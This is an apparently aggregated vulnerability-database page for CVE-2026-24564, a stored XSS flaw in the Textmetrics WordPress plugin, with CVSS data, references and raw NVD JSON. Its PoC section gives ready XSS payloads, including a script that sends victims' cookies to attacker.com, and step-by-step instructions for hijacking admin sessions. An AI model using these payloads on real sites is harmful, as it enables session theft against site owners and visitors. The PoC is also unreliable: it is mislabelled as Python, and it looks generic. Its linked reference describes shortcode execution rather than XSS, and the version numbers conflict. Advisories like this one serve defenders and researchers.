CVE-2026-24564

Description

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Israpil Textmetrics webtexttool allows Code Injection.This issue affects Textmetrics: from n/a through <= 3.6.5.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Textmetrics (webtexttool) 所有版本 <= 3.6.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2026-24564 PoC - Stored XSS in Textmetrics WordPress Plugin -->
<!-- This PoC demonstrates the XSS vulnerability in Textmetrics plugin <= 3.6.5 -->
<!-- Affected Component: Textmetrics webtexttool input field -->

<!-- Basic XSS Payload -->
<script>alert('XSS - CVE-2026-24564')</script>

<!-- More sophisticated payload for session hijacking -->
<script>
  // Steal cookies and send to attacker controlled endpoint
  var stolen_data = document.cookie;
  fetch('https://attacker.com/steal?data=' + encodeURIComponent(stolen_data));
</script>

<!-- Image tag XSS payload (bypasses some filters) -->
<img src=x onerror="alert('XSS Triggered')">

<!-- SVG XSS payload -->
<svg onload="alert('CVE-2026-24564 XSS')">

<!-- Event handler XSS payload -->
<body onload="alert('Stored XSS in Textmetrics')">

<!-- PoC Attack Steps:
1. Identify WordPress site with Textmetrics plugin <= 3.6.5
2. Navigate to Textmetrics plugin settings or content input area
3. Inject malicious XSS payload into any text field
4. Save/submit the content
5. When admin or other users view the page containing the injected content,
   the XSS payload will execute in their browser
6. Attacker can steal session cookies, perform actions as the victim,
   or redirect users to malicious sites
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24564
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24564
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24564/
[4] VulDB https://vuldb.com/cve/CVE-2026-24564
[5] https://patchstack.com/database/Wordpress/Plugin/webtexttool/vulnerability/wordpress-textmetrics-plugin-3-6-3-arbitrary-shortcode-execution-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24564", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:13.940", "lastModified": "2026-04-28T15:16:14.787", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Israpil Textmetrics webtexttool allows Code Injection.This issue affects Textmetrics: from n/a through <= 3.6.5."}, {"lang": "es", "value": "Neutralización Incorrecta de Etiquetas HTML Relacionadas con Scripts en una Página Web (XSS Básico) en Israpil Textmetrics webtexttool permite la Inyección de Código. Este problema afecta a Textmetrics: desde n/a hasta <= 3.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webtexttool/vulnerability/wordpress-textmetrics-plugin-3-6-3-arbitrary-shortcode-execution-vulnerability?_s_id=cve", "source": "[email protected]"}]}}